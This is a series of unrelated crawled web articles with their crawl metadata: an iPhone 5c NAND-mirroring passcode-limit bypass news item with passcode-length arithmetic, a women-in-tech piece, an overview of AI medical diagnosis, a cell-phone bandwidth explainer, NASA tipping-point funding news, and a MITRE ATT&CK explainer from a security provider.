Sergei Skorobogatov has described a method that can bypass one of iOS’s basic security features – the passcode attempt limit. The demonstration was carried out on an iPhone 5c device by modifying the NAND flash memory of the device. The engineer accessed the connection to the SoC and partially reverse engineered the bus protocol.

Apple encrypts the stored user data in non-volatile memory to protect the contents as well as the access credentials. This is a security precaution used to prevent unauthorized file recovery from lost or stolen devices. The bypass is essentially done using a NAND mirroring attack. The user’s passcode in iOS is stored together with the device’s unique ID (UID) key. The UID is hard-coded into the main SoC and is part of the CPU hardware security engine.

Skorobogatov used electronic tools to eavesdrop on the NAND chip communication. By analyzing the way it worked, he was able to bypass the passcode limit by attaching a backup NAND chip. The researcher notes that the sampled device, the iPhone 5c, is far from the latest Apple hardware: since its introduction, other models have been released that use different logic in their operations. However, the iPhone 5s and 6 use the same type of NAND flash devices, so it is possible that the cloning attack can be performed against them as well. The newer devices use a higher-speed chip with a PCIe interface, which makes such bypasses much more difficult.

The demonstration shows how a basic attack can be conducted, and the researcher notes that several improvements can be made. These include automated passcode entry and rebooting by using external USB controllers that emulate the necessary functions. Apple can implement countermeasures that prevent mirroring attacks by employing more robust authentication rather than a proprietary interface.
On the software side, a challenge-response authentication can be used to prevent access to the NAND memory. Users are encouraged to use at least 6-digit passcodes. The added length of the password makes brute force attacks much more difficult for criminals. For more information, you can download the research paper titled “The bumpy road towards iPhone 5c NAND mirroring”.
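The advice to use at least a 6-digit passcode comes down to simple arithmetic: each extra digit multiplies the search space by ten. A rough estimate of worst-case brute-force time, assuming the attacker can try a passcode every few seconds once the retry limit is bypassed (the 5-second per-attempt figure is an illustrative assumption, not taken from the paper):

```python
def worst_case_hours(digits, seconds_per_attempt=5):
    """Worst-case time to brute-force an all-digit passcode."""
    attempts = 10 ** digits  # each digit has 10 possible values
    return attempts * seconds_per_attempt / 3600

print(f"4 digits: {worst_case_hours(4):,.1f} hours")  # ~13.9 hours
print(f"6 digits: {worst_case_hours(6):,.1f} hours")  # ~1,388.9 hours
```

Under these assumptions, moving from a 4-digit to a 6-digit passcode stretches a roughly half-day attack into one lasting about two months, which is why the extra length matters so much once the attempt limit can be defeated.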
<urn:uuid:4af4b020-2535-40d1-a744-96597858d1e0>
CC-MAIN-2024-38
https://bestsecuritysearch.com/researcher-creates-method-bypasses-ios-password-limit/
2024-09-11T05:59:01Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651344.44/warc/CC-MAIN-20240911052223-20240911082223-00660.warc.gz
en
0.940002
487
2.828125
3
As in any industry, a lack of diversity amongst employees causes a one-minded way of thinking, resulting in decreased productivity and a lack of creative and innovative solutions when it comes to problem-solving. In the technology sector, diversity is crucial in the creation of artificial intelligence (AI) and machine learning systems that replicate human decision-making. As AI only learns what people show it, a lack of diversity can really limit its effectiveness. In prioritising diversity, algorithms learn better and more accurate information that’s useful for real-world applications.

But of course, there are huge opportunities for girls and women, too. Tech jobs offer higher starting salaries than many other industries, and independent analysis suggests tech as a profession offers more social mobility than medicine and law. We should be doing everything we can to help women access these professional opportunities.

Code First Girls recently organised a survey, which found 80% of respondents said that a career in tech was neither mentioned nor encouraged when they were at school. That’s why we provide free, virtual and accessible coding education, which means our learners can fit their studies flexibly around their lives – removing barriers for those in full-time education, work or with caring responsibilities. Code First Girls partner with more than 100 businesses including Rolls-Royce, NatWest, and GCHQ to get more women into an industry that is facing a major skills gap and desperately needs more diversity in the workforce.

And it’s not just gender diversity that Code First Girls is tackling. Whilst women make up 21% of the tech industry, black women make up less than 3%. There are also economic and regional inequalities, with 27% of our community eligible for free school meals. Although it’s hard to ignore the glass ceiling we face as women, it’s important to put aside any fear.
Whilst coding, technology and STEM may be entirely new and unknown to women considering a career change, there’s no need to be afraid. There are many transferable skills that can help when it comes to coding, including innovative thinking, attention to detail, patience and communication. It’s also important to take advantage of coding communities and network with like-minded women to get the support you need. Whether it’s a technical question or an industry query, speaking to other women can help you to boost your learning and achieve your career goals, as they are likely to have experienced some of the same issues. Words: Anna Brailsford
<urn:uuid:0e3d19a8-6c7a-4909-a7d0-384f6d3bc6ad>
CC-MAIN-2024-38
https://march8.com/articles/trailblazer-anna-brailsford-ceo-of-code-first-girls
2024-09-16T07:06:02Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651676.3/warc/CC-MAIN-20240916044225-20240916074225-00260.warc.gz
en
0.964719
509
2.609375
3
A second opinion might not come from a doctor anymore; instead, patients might consult artificial intelligence software.

Artificial intelligence (AI) is the simulation of human intelligence by machine learning algorithms. It is a technology that has been developed to mimic the way humans think and make decisions. The concept of AI was first described as early as 1950. However, it was not until the invention of deep learning that AI had practical applications. Now, AI has advanced to the point where its problem-solving capabilities are sometimes more advanced than humans’.

Healthcare tops the list of industries utilizing AI by a landslide, so it’s no surprise that recent advances in AI have been centered on improving healthcare—everything from administrative workflow to patient diagnosis and treatment. Using machine learning algorithms, AI can see patterns and “learn” to diagnose based on these patterns. AI can be programmed to flag signs of abnormalities and symptoms of diseases in medical images like MRIs, x-rays, and CT scans. These types of software are composed of a neural network that evaluates medical images alongside genetic information. This data is used in the AI’s decision-making process for high accuracy and insight into a patient’s condition.

It’s safe to say that AI is, by and large, successful at correctly diagnosing patients. It takes years of training for doctors to learn how to diagnose illnesses correctly. Even then, misdiagnosis is rampant; an estimated one out of 20 adult patients is misdiagnosed every year in the U.S. Similar to the intense practice doctors must undergo, it takes thousands of examples for an algorithm to learn how to recognize illness. In fact, with a standard accuracy of 72.52%, AI diagnoses illness even more accurately than the average doctor, who, in the same study, diagnosed with 71.4% accuracy.

For AI to diagnose patients with that level of accuracy, the examples need to be based on factual data.
For that reason, AI is most useful in processes that involve digitized diagnostic information that doesn’t leave much room for guesswork or misinterpretation. AI technologies that can interpret non-digital information, such as handwritten doctor’s notes, are currently developing. However, it may be some time before such technologies learn to recognize more complex, non-digital data.

In the past, AI was built to learn to diagnose following the same thought process doctors use. The original intention was for AI to mimic human behaviors as closely as possible. However, in many ways, AI’s cold, objective reliance on probabilities and factual data is advantageous. In some cases, machines are now more adept at diagnosing human illness than humans are.

Some illnesses are more complex to diagnose than others, whether for lack of resources, scarcity of qualified professionals, or human limitations. Below are several examples of common illnesses that are diagnosed with the help of AI.

Breast cancer is the most common cancer found in women, with about one in eight women afflicted in their lifetime. This type of cancer is detected using mammograms and ultrasounds. AI used in digital mammography has been found to improve the accuracy and efficiency of breast cancer screening. According to a 2019 study published by Oxford University Press, the AI in digital mammography machines uses “deep learning convolutional neural networks, feature classifiers, and image analysis algorithms to detect calcifications and soft tissue lesions.” Based on these findings, the software assigns a score between one and ten. One represents the lowest level of suspicion that cancer is present, while 10 represents the greatest. To give the score, the AI compares the patient’s data to thousands of ultrasound images, both healthy and abnormal.

Lung cancer is the deadliest cancer globally, accounting for about 25% of all cancer-related deaths.
AI technologies have been developed to recognize early signs of lung cancer that are not visible to doctors. New AI technology uses deep learning to find lung cancer early. Early diagnosis can make all the difference for a cancer that kills 75% of patients within five years of diagnosis. Rather than relying on whatever parameters a human programmer classifies as malignant, the machine analyzes thousands of CT scans and learns for itself what lung cancer looks like.

Before AI’s assistance, lung cancer was often not detected in time for effective treatment. This could be due to several things, such as ignored symptoms or doctors’ limitations in detecting tumors with the naked eye – it’s easy for tiny, malignant tumors to be missed.

Tuberculosis remains the deadliest infectious disease. Now, it can be diagnosed with high accuracy using a smartphone camera. Like the above examples, the AI used in this technology also applies a deep-learning model. It was developed using a database of 250,044 chest x-rays. These x-rays, which did not show tuberculosis, were used to train the neural network to recognize abnormalities. The model was then recalibrated using an augmented data set and an additional two-layer neural network. The software can detect tuberculosis in smartphone photos of x-rays.

This kind of AI is a critical tool in regions with high tuberculosis prevalence or limited resources. Traditional diagnosis by radiologists, on the other hand, has proven more expensive and less accurate. This particular AI features rapid reading and reporting – it determines whether an x-ray shows tuberculosis in under two minutes. This is critical for an infection like tuberculosis, as early detection leads to higher survival rates.

Earlier this week, Google announced the development of an AI-powered dermatology tool that can detect skin problems. Google says that every year they see nearly ten billion Google Searches related to skin, nail, and hair issues.
Google’s new application is web-based and requires the use of a smartphone camera. Using their camera, a user must take photographs of the problematic area from three different angles. The user is then asked to answer questions about their skin type and how long they’ve had symptoms. The application then draws from its knowledge of 288 conditions to provide users with a list of possible conditions they may be experiencing.

Google stresses that the tool is not to be used in place of a formal diagnosis. However, it may be very useful for those who have limited resources and cannot see a dermatologist. The tool shows information and an FAQ for the identified condition to give users the information needed to make a treatment decision. As the AI continues to be developed, it may prove to be an invaluable tool for people unsure whether they need to see a doctor for their skin condition.

Diabetic retinopathy is a condition that affects the eyes due to diabetes. There are a few technologies in development that use AI to screen patients for diabetic retinopathy. One system, IDx-DR, has already been cleared by the FDA for the detection of diabetic retinopathy. Two images are captured per eye. The images are then scanned for signs of diabetic retinopathy within minutes. Other systems, like the EyeArt AI Screening System, use similar mechanisms but do not require substantial training to use. EyeArt also supports a dual diagnosis from both the AI and a human doctor, which opens up possibilities for a wholly novel diagnosis method.

AI can be used to flag abnormalities in medical imaging, predict outcomes of a stroke, and help patients manage chronic diseases. Increasingly, AI is being used to diagnose illnesses such as cardiac arrhythmia, lung cancer, skin lesions, and diabetic retinopathy. AI continues to have vast implications for the healthcare industry overall. This technology has become an essential tool in a field that is in constant need of trained professionals.
Over-demand and under-supply leave many physicians over-exerted and delay treatment. The medical profession has one of the highest rates of burnout: nearly 42% of practicing physicians report feeling burned out. Many doctors experience exceedingly high levels of stress before they even begin practicing. With this in mind, we can see how AI can improve the experience of both patients and physicians, improve diagnostics and treatment outcomes, and, when early detection is critical, be the difference between life and death.
<urn:uuid:e0df6200-60b4-4773-a807-6134e1066095>
CC-MAIN-2024-38
https://plat.ai/blog/how-ai-assists-in-medical-diagnosis/
2024-09-16T06:53:18Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651676.3/warc/CC-MAIN-20240916044225-20240916074225-00260.warc.gz
en
0.955976
1,669
3.90625
4
Whether you need to entertain your kid on a long car ride or want to stream the latest sports game from any location, your phone's data network has your back. LTE, 4G, 5G, and other phone data service variations provide you with on-the-go internet access. However, meeting the dreadful spinning download icon just as your favorite team's about to score a goal or before battling enemies in a video game can cause plenty of frustration. Understanding your network's bandwidth could save you from those irritating moments and keep you from missing monumental moments on your phone. Here’s what cell phone users should know about bandwidth.

Bandwidth vs. Internet Speed

People commonly mistake bandwidth and internet speed for one another, but the two are distinct. Bandwidth refers to the amount of data uploaded and downloaded between your cell and the internet. Meanwhile, the rate at which the data travels relates to your internet speed. Your bandwidth can affect the internet speed, but differing internet speeds don't change your bandwidth.

Bandwidths are like tunnels. The wider the tunnel, the more cars pass through. However, the smaller the tunnel, the greater the congestion. The cars in this scenario represent the data traveling to and from a device connected to the internet. Regardless of the speed of the cars (internet speed), if the tunnels (bandwidth) aren't big enough to handle numerous cars simultaneously, increases in traffic (download and upload interruptions) occur.

What Affects Bandwidth?

Numerous devices simultaneously connecting to the same network means more data trying to pass through the system. Small bandwidths struggle to accommodate great demands for information, causing less data to travel to and from your phones, ultimately hindering everyone's connection experience and increasing buffering times.
Likewise, running multiple apps at once increases the amount of information required to upload and download through the system, creating lag, wait times, and connection issues.

How To Fix Bandwidth Issues

You can enhance your data usage, strength, and quality in various ways, from limiting the number of devices on a network to clearing your internet search cache and upgrading network plans. Cellular boosters can enhance your connection since they boost the signals that carry the data and information uploaded and downloaded between your network and phone. They capture, amplify, and retransmit nearby signals, increasing cellular connection strength and quality. Moreover, their antennas provide clear, concise, and optimal pathways for information to travel across, upping signal strength and helping relieve some of the burden on your bandwidth.

SureCall Boosters in Canada provides various cell phone reception boosters to amplify your cellular connectivity and support your network bandwidth in your home, commercial building, or vehicle. The more knowledge you have on what cell phone users should know about bandwidth, the better your chances of avoiding interrupted streams, slow buffering times, and other data usage issues. Plus, you can select a bandwidth that suits you or your household's needs. Watch your favorite teams dominate their opponents live, play lag-free games, and perform work tasks unhindered with the right bandwidth pairing and knowledge.
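The tunnel analogy can be put into numbers: transfer time is the amount of data divided by each device's share of the link. Here is a rough sketch, assuming the link's capacity is split evenly among active devices (real networks schedule traffic less evenly, so treat this as a back-of-the-envelope estimate):

```python
def download_seconds(file_mb, link_mbps, active_devices=1):
    """Estimate download time when a link's bandwidth is shared evenly."""
    file_megabits = file_mb * 8            # 1 byte = 8 bits
    share_mbps = link_mbps / active_devices
    return file_megabits / share_mbps

# A 50 MB video clip on a 100 Mbps link:
print(download_seconds(50, 100, active_devices=1))  # 4.0 seconds
print(download_seconds(50, 100, active_devices=8))  # 32.0 seconds
```

The same clip that downloads in seconds on an idle link crawls once a houseful of devices shares the tunnel — which is exactly the congestion effect described above.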
<urn:uuid:968482e4-99ca-492e-abd4-cb7d7e4f004d>
CC-MAIN-2024-38
https://www.surecallboosters.ca/post/what-cell-phone-users-should-know-about-bandwidth
2024-09-18T17:56:57Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651931.60/warc/CC-MAIN-20240918165253-20240918195253-00060.warc.gz
en
0.931391
623
2.9375
3
NASA has launched its third round of funding for what it calls "tipping point" technologies. It wants to encourage companies to invest in the agency's mission and develop technologies that can help with space exploration. The catch? The company must be able to develop programs that are mature enough to have commercial application.

Tipping point technologies are defined by NASA as programs where a reasonable investment is needed to advance current missions, but that also ease the transition into the commercial space market. These technologies are ranked by readiness, according to Stephen Jurczyk, NASA associate administrator for the Space Technology Mission Directorate.

"We want to encourage new and innovative technologies and new innovative approaches … developing the technologies that we need for our future capabilities," Jurczyk said on Federal Drive with Tom Temin.

But the technologies have to be at least at readiness level four to be considered successful investments. In other words, the technology must have been demonstrated to work in a laboratory environment.

"We're trying to get [them] to a six," he said. "Which is tested in a simulated space environment on the ground and get it to the point where it's getting ready to fly."

Technologies ranked at six or higher are tested on a parabolic aircraft with at least 30 seconds in a microgravity environment. Another way NASA can test these new applications is through its partnership with Blue Origin and the New Shepard vehicle. On that vehicle, the technology is exposed to about three minutes of continuous microgravity, Jurczyk said. This simulated flight experience gives the agency time to "shake out" the technology before deploying it to the International Space Station or aboard another spacecraft.

Proposed technologies may have had prior NASA investment, research and development investment from other government agencies, or funding through NGOs and venture capital.
For this third round of funding, Jurczyk said the directorate is focusing on technologies that will help with three main missions:

- Expanding utilization of space
- Enabling efficient, safe transportation into and through space
- Increasing access to the surfaces of other planets

"We want to provide more flexibility for industry to propose," he said. "And then in order to deal with the larger number of proposals that we might get because we're not narrowing it down to specific technology areas, we defined a two-step proposal process."

First-step proposals — short, introductory white papers — are due at the end of January. Jurczyk said the directorate will whittle down the list of proposals and release a list of accepted proposals in March 2018. Full proposals from that list will be due in May 2018. Evaluations will take place soon after, and he said the agency hopes to put contracts in place by the end of the summer.

"Mostly, we are looking to enable commercial space activities, and we're looking for not only how the technology would enable a capability that would advance the company's interests, but also kind of their business strategy," Jurczyk said.

For more information, visit the directorate website.
<urn:uuid:58daf45d-6c53-48b6-865b-1c500f321fbb>
CC-MAIN-2024-38
https://federalnewsnetwork.com/technology-main/2017/12/nasa-reaches-out-to-commercial-technology-sector-to-improve-space-exploration/?readmore=1
2024-09-19T20:21:15Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652067.20/warc/CC-MAIN-20240919194038-20240919224038-00860.warc.gz
en
0.955911
652
2.65625
3
The MITRE ATT&CK Framework is a knowledge base of adversary tactics and techniques that can be used as a foundation for classifying attacker behaviors and assessing an organization's vulnerabilities. Created in 2013 by the MITRE Corporation, a non-profit that supports U.S. government agencies, it is one of the most comprehensive sources for classifying threats and developing threat models. The ATT&CK portion of the name stands for Adversarial Tactics, Techniques, and Common Knowledge. Simply put, you can think of the MITRE ATT&CK knowledge base as a "Wikipedia" of cyber threats and tactics.

MITRE is a government-funded research organization that was born out of MIT in 1958. MITRE started ATT&CK in 2013 to document the common tactics, techniques, and procedures (TTPs) that advanced persistent threats use against Windows enterprise networks, growing out of a need to document adversary behaviors for a MITRE research project.

The MITRE ATT&CK Matrices lay tactics and techniques out in a "periodic table" used by threat hunters, defenders, and other cybersecurity professionals to classify attacks and assess an organization's risk. The most widely used is the MITRE ATT&CK® Matrix for Enterprise, which covers the following platforms: Windows, macOS, Linux, PRE, AWS, GCP, Azure, Azure AD, Office 365, SaaS, and Network.

The MITRE ATT&CK tactics represent the "why" of a technique: what is the adversary's objective when performing an action? Tactics give important context to the offensive action. Techniques are the "how" component, describing how an adversary achieves the tactic. They may also represent "what" an adversary gains by performing an action.
There are a number of ways an organization can utilize the MITRE ATT&CK framework. For example, when choosing a Managed Security Service Provider (MSSP) for outsourced threat detection and response services, the framework proves its value in a Security Operations Center (SOC).

Lumifi uses the MITRE ATT&CK framework in several ways. First, our content team maps each of our alerts to a technique, which allows us to see where our detections are heaviest and where we need to expand our ruleset. When our analysts are threat hunting, they use MITRE techniques as guides for the tactics, techniques, and procedures (TTPs) they should be on the lookout for. Doing so allows us to find gaps in customer visibility. One use case: if all of a customer's alerts fall in the Reconnaissance phase but little else, we can assume we are not receiving all relevant data. That starts a process where we take another look at their environment and check whether their critical logging source has changed its logging format.

Another benefit is trend data. Lumifi receives alerts across our clients' environments collectively, where they can be categorized using the MITRE framework: for example, a spike in Initial Access through phishing, like the one at the initial onset of COVID-19, or an influx of supply chain attacks during the SolarWinds fiasco. Our customers receive more information so they can become more granular with their defense strategies and focus on weak areas. For example, if we see a customer with a large number of phishing emails, they may need to step up their email filtering. Or if we see an increase in privilege escalation, defense evasion, or credential access, we should figure out the origin of these attacks and ensure the customer has a solid Endpoint Detection and Response platform. MITRE allows Lumifi to identify gaps in security and gives a broad picture of where our SOC should focus and how to better assist our clients.
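Lumifi's internal tooling is not public, but the alert-to-technique mapping and tactic-trend counting described above can be sketched in a few lines. In this illustrative sketch, the detection rule names are invented; the technique IDs and tactic names, however, are real ATT&CK identifiers.

```python
from collections import Counter

# Hypothetical mapping of detection rules to ATT&CK (technique ID,
# technique name, tactic). Rule names are illustrative only.
RULE_TO_TECHNIQUE = {
    "suspicious_email_link": ("T1566", "Phishing", "Initial Access"),
    "new_scheduled_task":    ("T1053", "Scheduled Task/Job", "Execution"),
    "lsass_memory_read":     ("T1003", "OS Credential Dumping", "Credential Access"),
    "port_scan_detected":    ("T1595", "Active Scanning", "Reconnaissance"),
}

def tactic_summary(alert_rules):
    """Count alerts per ATT&CK tactic to surface trends and coverage gaps."""
    counts = Counter()
    for rule in alert_rules:
        mapped = RULE_TO_TECHNIQUE.get(rule)
        if mapped:
            counts[mapped[2]] += 1   # index 2 is the tactic name
        else:
            counts["Unmapped"] += 1  # a visibility gap worth investigating
    return counts

alerts = ["suspicious_email_link", "suspicious_email_link",
          "port_scan_detected", "unknown_rule"]
print(tactic_summary(alerts))
# Counter({'Initial Access': 2, 'Reconnaissance': 1, 'Unmapped': 1})
```

A skew toward one tactic (here, Initial Access via phishing) or a pile of unmapped alerts is exactly the kind of signal that would prompt a second look at a customer's email filtering or logging sources.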
Every level of our security operations team uses the MITRE ATT&CK framework, from reporting to tasking the threat content team to see if customers need specialized assistance or guidance. Lumifi's proprietary orchestration tool, SHIELDVision, utilizes the MITRE ATT&CK framework to provide concise identification and feedback. We use the framework in our automated scans, hunting scans, and investigations, and analysts record the access and technique according to the framework. Customers can rest easier knowing we are mapping their networks to the MITRE framework, and they receive additional insight in their quarterly calls with our engagement team.

The MITRE ATT&CK Framework is an important tool for red and blue teams alike. Whether it's used for emulating an attack or informing security decisions, the framework is a useful piece of the cybersecurity landscape. Leading MSSPs use it to provide in-depth investigations, threat hunt, and communicate clearly with their customers. To learn more about how Lumifi uses the MITRE ATT&CK Framework and how we can protect your network, contact us today.
<urn:uuid:bfa23efb-625d-4271-9dca-d88f38d4861d>
CC-MAIN-2024-38
https://www.lumificyber.com/blog/what-is-the-mitre-attck-framework/
2024-09-19T21:07:13Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652067.20/warc/CC-MAIN-20240919194038-20240919224038-00860.warc.gz
en
0.917462
1,051
2.75
3